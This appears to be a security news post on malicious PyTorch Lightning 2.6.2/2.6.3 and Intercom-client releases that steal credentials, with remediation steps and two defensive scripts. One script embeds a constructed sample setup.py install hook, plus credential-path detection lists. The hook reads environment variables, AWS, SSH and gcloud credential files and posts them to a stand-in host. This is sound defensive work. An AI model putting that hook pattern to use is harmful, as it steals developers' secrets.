PyTorch Lightning and Intercom-client hit by supply chain attacks. Malicious versions 2.6.2 and 2.6.3 steal credentials. Learn how to protect yourself and what to do if affected.
Another day, another supply chain attack. This time, it's PyTorch Lightning and Intercom-client that got hit. Threat actors managed to compromise these popular Python packages to push malicious versions that steal credentials. If you're using these libraries, you need to pay attention.
According to security firms Aikido Security, OX Security, Socket, and StepSecurity, the two malicious versions of PyTorch Lightning are 2.6.2 and 2.6.3. Both were published on April 30, 2026. The campaign is assessed to be an ongoing threat, and the attackers are getting smarter about hiding their code.
### What Happened Exactly?
The attackers didn't just drop a random script somewhere in the package. They injected credential-stealing code into the package's installation step, so the payload runs the moment `pip install` processes the compromised version, with whatever privileges the installing user has, and before your own code ever imports the library. The script then looks for saved credentials on the host: passwords, API keys, and tokens stored in config files or environment variables.
The malicious code targets:
- Cloud service credentials (AWS, GCP, Azure)
- Database passwords
- API tokens for services like GitHub and GitLab
- SSH keys and other authentication files
This isn't a simple phishing attack. It's a supply chain compromise that affects anyone who installed these versions, and "checking the hash" only helps if you compare against a hash you recorded from a release you had already vetted: the hash PyPI publishes for a malicious release matches that malicious release perfectly. Pin exact versions with hashes (pip's `--require-hashes` mode) to a known-good release, and treat any unexpected new version as untrusted until someone has reviewed it.
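To make the "injected into the installation process" point concrete, here is a small triage tool for the most common way such a payload is delivered: a `setup.py` that overrides one of setuptools' command classes so its code runs during `pip install`. This is an added example, not code from the original post or from the PyTorch Lightning project, and the delivery mechanism is an assumption (the post does not say how the payload was hooked in). The two `setup.py` samples are constructed for the demonstration; the hooked one imitates the shape of an install-time credential stealer and is only ever parsed, never executed.

```python
"""Triage a setup.py for install-time hooks that could harvest credentials."""
import ast

# Calls and attributes whose use inside an install hook deserve a close look.
SUSPICIOUS_NAMES = {
    "environ", "getenv", "expanduser", "subprocess", "Popen", "urlopen",
    "requests", "socket", "b64decode", "b64encode", "exec", "eval",
    "compile", "marshal", "zlib",
}
# Fragments of paths where developer credentials usually live.
SUSPICIOUS_PATHS = (
    ".aws", ".ssh", ".config/gcloud", ".azure", ".netrc", ".git-credentials",
    ".docker/config.json", ".pypirc", ".kube/config",
)
# setuptools command classes that run during `pip install` of an sdist.
HOOK_BASES = {"install", "develop", "egg_info", "build_py", "sdist"}


def _names(node):
    """Yield every bare name and attribute tail used under an AST node."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Name):
            yield sub.id
        elif isinstance(sub, ast.Attribute):
            yield sub.attr


def _strings(node):
    """Yield every string literal under an AST node."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Constant) and isinstance(sub.value, str):
            yield sub.value


def triage_setup_py(source):
    """Parse setup.py source (never execute it) and return (kind, detail) findings.

    An empty list means no install-time command hook was found; it does not
    prove the package is clean, since payloads can also hide in package code.
    """
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.ClassDef):
            bases = {n for b in node.bases for n in _names(b)}
            hooks = sorted(bases & HOOK_BASES)
            if not hooks:
                continue
            # A subclass of setuptools' install/develop/... commands runs with
            # the installing user's privileges before the package is imported.
            findings.append(("install_hook", f"class {node.name} subclasses {hooks[0]}"))
            for bad in sorted(set(_names(node)) & SUSPICIOUS_NAMES):
                findings.append(("suspicious_call", f"{node.name} uses {bad}"))
            for text in _strings(node):
                if any(p in text for p in SUSPICIOUS_PATHS):
                    findings.append(("credential_path", f"{node.name} references {text!r}"))
        elif isinstance(node, ast.keyword) and node.arg == "cmdclass":
            findings.append(("cmdclass", "setup() replaces one or more command classes"))
    return findings


# Constructed samples, parsed only. The second one imitates the shape of an
# install-time credential stealer; it is NOT the real payload from the post.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="example", version="1.0.0", packages=["example"])
'''

HOOKED_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import os, base64, urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        loot = {"env": dict(os.environ)}
        for rel in (".aws/credentials", ".ssh/id_rsa", ".config/gcloud/credentials.db"):
            path = os.path.expanduser("~/" + rel)
            if os.path.exists(path):
                loot[rel] = open(path, "rb").read()
        urllib.request.urlopen("https://collector.invalid/", data=base64.b64encode(repr(loot).encode()))

setup(name="example", version="1.0.0", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("hooked", HOOKED_SETUP)):
        print(label)
        for kind, detail in triage_setup_py(src):
            print(f"  [{kind}] {detail}")
```

Run it over the `setup.py` of a downloaded sdist (`pip download --no-binary :all: --no-deps <package>==<version>`) before installing, and remember that a wheel has no `setup.py` at all, so for wheels the equivalent check is reading the package code itself. The heuristics are deliberately noisy: a legitimate post-install hook will trip `install_hook` and `cmdclass` too, and the point is to make you read it, not to decide for you.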

### How Did They Pull This Off?
The initial access vector has not been confirmed in the reports cited above; the likely candidates are a compromised maintainer account or a compromised CI/CD release pipeline. Either way, the attackers were able to push the malicious versions to PyPI, the official Python package repository. Since PyTorch Lightning is a popular package with millions of downloads, the potential impact is large.
Here's the scary part: the malicious code was obfuscated, so it wasn't obvious at first glance. The security firms caught it because they monitor new releases of popular packages for unexpected changes; an ordinary user would have had no idea anything was wrong until their credentials were already gone.
### Who's Affected?
Anyone who installed PyTorch Lightning version 2.6.2 or 2.6.3 between April 30 and the time the malicious versions were pulled from PyPI. Removal from PyPI does not help hosts that already installed them, and it does not help environments that reinstall from a lockfile, a pip cache, or an internal mirror that still carries those versions. The same goes for Intercom-client, though the exact affected versions for that package haven't been fully disclosed yet.
If you're a developer, data scientist, or anyone using Python for machine learning or API integrations, you need to check your installed packages right now.
### What Should You Do?
First, don't panic. But do take action immediately.
- Check your installed packages. Run `pip show pytorch-lightning` (or `pip list | grep -i lightning`) and look for version 2.6.2 or 2.6.3. Check every environment that could have installed it since April 30: laptops, notebook servers, CI runners, and container images, not just your main machine.
- If you find an affected version, uninstall it: `pip uninstall pytorch-lightning`. Clear the pip cache as well (`pip cache purge`) so a cached copy of the malicious build cannot be reinstalled.
- Reinstall a version that is known clean. The last release before the malicious ones is 2.6.1, so `pip install pytorch-lightning==2.6.1` is the safe pin (not "2.6.1 or newer", which would match the bad versions); move to a later release only once it has been confirmed clean. Update lockfiles and requirements pins to match.
- Assume the credentials on any affected host were taken, because the theft happened at install time and uninstalling does not undo it. Rotate them: cloud keys, database passwords, GitHub and GitLab tokens, SSH keys, and anything held in `.env` files or environment variables. Then check the audit logs for those credentials (cloud provider activity logs, Git hosting audit logs) for use you did not initiate.
- Scan the affected hosts for suspicious processes, persistence, or unauthorized access, and treat them as compromised until they have been cleared.
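The checks above are easy to get wrong by hand across many environments and lockfiles, so here is a script that does the first three steps for the versions named in the post. It is an added example, not code from the original post or from the PyTorch Lightning project. It checks the distributions installed in the running interpreter and any `name==version` pins in requirements or constraints text, and can rewrite affected pins to the last-known-good release named in the post (2.6.1). One assumption: the project also publishes under the distribution name `lightning` with the same version numbers, so those pins are flagged for review only, since the post does not name that package as compromised. The requirements text is a constructed sample.

```python
"""Find pins and installs of the PyTorch Lightning versions named in the post."""
from importlib import metadata
import re

AFFECTED_NAME = "pytorch-lightning"
SUSPECT_VERSIONS = {"2.6.2", "2.6.3"}      # the two versions named in the post
KNOWN_GOOD = "2.6.1"                        # last release before them, per the post
# Assumption: the project also publishes under the name `lightning` with the
# same version numbers. The post does not name it, so it is only flagged for review.
ALIAS_NAME = "lightning"


def normalize(name):
    """PEP 503 name normalisation, so PyTorch_Lightning == pytorch-lightning."""
    return re.sub(r"[-_.]+", "-", name).lower()


def verdict(name, version):
    """'AFFECTED' for a named bad build, 'review' for the alias, else None."""
    if version not in SUSPECT_VERSIONS:
        return None
    if name == AFFECTED_NAME:
        return "AFFECTED"
    if name == ALIAS_NAME:
        return "review"
    return None


def check_installed():
    """Return [(name, version, verdict)] for suspect distributions in this interpreter."""
    hits = []
    for dist in metadata.distributions():
        name = normalize(dist.metadata.get("Name") or "")
        v = verdict(name, dist.version)
        if v:
            hits.append((name, dist.version, v))
    return hits


# Matches `name==version` pins; hashes, markers and comments may follow.
PIN = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)\s*==\s*([0-9][^\s;#\\]*)")


def scan_requirements(text):
    """Return [(lineno, name, version, verdict)] for pins that would install a suspect build."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = PIN.match(line)
        if not m:
            continue
        name, version = normalize(m.group(1)), m.group(2)
        v = verdict(name, version)
        if v:
            hits.append((lineno, name, version, v))
    return hits


def repin(text, good=KNOWN_GOOD):
    """Rewrite AFFECTED pins to the known-good version, leaving everything else untouched."""
    out = []
    for line in text.splitlines():
        m = PIN.match(line)
        if m and verdict(normalize(m.group(1)), m.group(2)) == "AFFECTED":
            line = line[:m.start(2)] + good + line[m.end(2):]
        out.append(line)
    return "\n".join(out) + "\n"


# Constructed sample requirements file for the demonstration.
SAMPLE_REQUIREMENTS = """\
torch==2.5.1
pytorch-lightning==2.6.2   # bumped on April 30
PyTorch_Lightning==2.6.1
lightning==2.6.3
intercom-client==1.0.0
"""

if __name__ == "__main__":
    for hit in check_installed():
        print("installed:", *hit)
    for hit in scan_requirements(SAMPLE_REQUIREMENTS):
        print("pinned:", *hit)
    print(repin(SAMPLE_REQUIREMENTS))
```

Run `check_installed()` inside each virtual environment, notebook kernel, and container image you care about, since it only sees the interpreter it runs in, and feed `scan_requirements()` every `requirements*.txt`, constraints file, and pip-compile output in your repositories. Repinning is the easy part; it does nothing for hosts that already ran the install, which still need the credential rotation and log review described above.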
### Why Supply Chain Attacks Are So Dangerous
Supply chain attacks like this one are particularly nasty because they exploit trust. You install a package thinking it's safe, but it's been poisoned. The attackers don't need to trick you into clicking a link. They just need to compromise one maintainer account, and suddenly thousands of users are at risk.
This isn't an isolated incident either. We've seen similar attacks on npm, RubyGems, and other package repositories. The pattern is always the same: compromise a popular package, inject malicious code, and wait for the downloads to roll in.
### The Bottom Line
Software supply chain security isn't just a buzzword. It's a real threat that affects everyone who uses open-source packages. The PyTorch Lightning attack is a wake-up call. Pin exact versions with hashes to releases you have actually vetted (a checksum fetched alongside a malicious release only confirms you got the malicious release), don't upgrade blindly the day a new version lands, and monitor your environments and your credentials for unusual activity.
Stay safe out there. And remember: when in doubt, don't install.